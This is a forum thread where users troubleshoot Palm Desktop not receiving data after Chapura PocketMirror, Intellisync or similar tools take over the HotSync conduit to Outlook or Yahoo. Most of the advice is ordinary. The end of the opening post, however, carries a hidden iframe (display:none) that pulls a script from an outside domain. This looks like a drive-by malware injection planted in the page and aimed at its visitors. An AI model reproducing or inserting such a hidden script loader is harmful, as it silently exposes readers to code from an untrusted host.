+ Reply to Thread

How come my Palm Desktop is not being updated???

I just open my Palm Desktop today and notice I don't have anything in it. No Address/contacts, no Tasks, no notes. Nothing. But I sync it everyday. Is there something wrong with my phone?

BTW, I have chapura installed with MS Outlook XP and everything seems to be in there.

I have a new addressbook program that allows me to put pictures on my contacts and it uses the contacts on my Palm Desktop and since I have nothing in there and it wouldn't sync up to my phone I couldn't use this program.

Is there any way to have the contacts in both places (outlook and palm desktop)?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, you've identified the problem. I don't know if you can sync up to both Desktop and Outlook short of manually changing settings, but when you have Chapura in it only syncs with Outlook and ignores Desktop. If you find out how to sync with both automatically, be sure to post it because I wouldn't mind being able to do that myself.
    ---------------
    The same thing we do every night, Pinky...

THat is correct, it will only sync with Outlook if you are using Pocket Mirror for your conduits. Palm Desktop does nothing other than supplying you with the install and syncronization (hotsync) tools.

I should have given you more information in the first post, though. If you want both programs updated, you can open the Pocketmirror settings and manually make a "one time only" setting for it to sync items with Desktop. You could do that as often as you want to get everything synced up. I would just be sure that when you do that you set it for "handheld overwrites desktop" to avoid getting old info put back onto your palm.
    ---------------
    The same thing we do every night, Pinky...

How do you manually change it every once in awhile so that it can update the desktop when you want to manually? I used to do that with my 6035 and the old desktop, but I can't for the life of me find it with the new 7135 one.
    ~'kito
    pdaPhoneHome Moderator

A gotcha on this topic that "got me"...

I had palm desktop and everything was working fine for me.

I installed 'intellisync' so that I could sync everything up to my yahoo account for calendaring, etc.

After a while, I noticed that none of the changes that I entered in palm desktop were getting transmitted to the phone (or yahoo).

Come to find out, intellisync was hijacking the conduit and syncing my phone to yahoo, but not doing anything with the palm desktop.

The brute force solution i found: forget updating yahoo. uninstall intellisync.
    -- Everything I say is pure speculation.

Originally posted by BrerLapn
    I should have given you more information in the first post, though. If you want both programs updated, you can open the Pocketmirror settings and manually make a "one time only" setting for it to sync items with Desktop. You could do that as often as you want to get everything synced up. I would just be sure that when you do that you set it for "handheld overwrites desktop" to avoid getting old info put back onto your palm.
    So if I update my palm desktop first, then modifiy with what ever I need, then sync it back to my palm. Then that should be the most up to date with everything I had before and my updates? Or will I lose everything prior to the sync to desktop?

Desktop to Go takes over as well and bypasses any sync with Palm Desktop. My question would be, why would you want it any other way? Who uses Palm Desktop as their main contact organizing system? No offense to anyone who does - it just seems so lame compared with Act or Outlook.

Originally posted by kvandivo
    The brute force solution i found: forget updating yahoo. uninstall intellisync.
    I learned this too for different reasons. I have an RMA to return Intellisync.

There is a solution to update your PC's PIM (PAlm Desktop/Outlook/whatever) and Yahoo!

You have to activate it manually, but it actually will sync your PIM and Yahoo!

http://help.yahoo.com/help/us/intsync/index.html

It may be what you are already using, but doubt it because it is this is free! Just set it to Sync with Outlook, or whatever. It doesn't touch your conduits. This way you can have two copies.

Originally posted by HoTSynC
    There is a solution to update your PC's PIM (PAlm Desktop/Outlook/whatever) and Yahoo!

You have to activate it manually, but it actually will sync your PIM and Yahoo!

http://help.yahoo.com/help/us/intsync/index.html

It may be what you are already using, but doubt it because it is this is free! Just set it to Sync with Outlook, or whatever. It doesn't touch your conduits. This way you can have two copies.
    According to that link, it'll sync Yahoo with everything *but* Palm Desktop. Given the security issues with Outlook, I'm not trusting my contact data in it at all. I'll have to check out ACT, I've heard good things about it...

Another option for syncing with Palm Desktop and Outlook is to use SwitchSync.

I haven't tested it out, so I don't know how well it works.

Alan G

Originally posted by Peter
    Who uses Palm Desktop as their main contact organizing system? No offense to anyone who does - it just seems so lame compared with Act or Outlook.
    When I first got my 6035, it came with PocketMirror. So, my boss and I tried using Outlook instead of Palm Desktop (he uses a IIIc). It turns out that we both simply prefer the Palm Desktop to Outlook. It has been over a year since we made that decision, so I can't really give you any specifics on "WHY." However, for at least some of us here, it is a personal preference.
    Nicky

Originally posted by AlanG
    Another option for syncing with Palm Desktop and Outlook is to use SwitchSync.

I haven't tested it out, so I don't know how well it works.

Alan G
    Good find!
    Could someone with more guts than I, test it?
    ~'kito
    pdaPhoneHome Moderator

Re: How come my Palm Desktop is not being updated???

no need to un install yahoo sync. Just don't select anything in yahoo sync. Palm desktop will start syncing again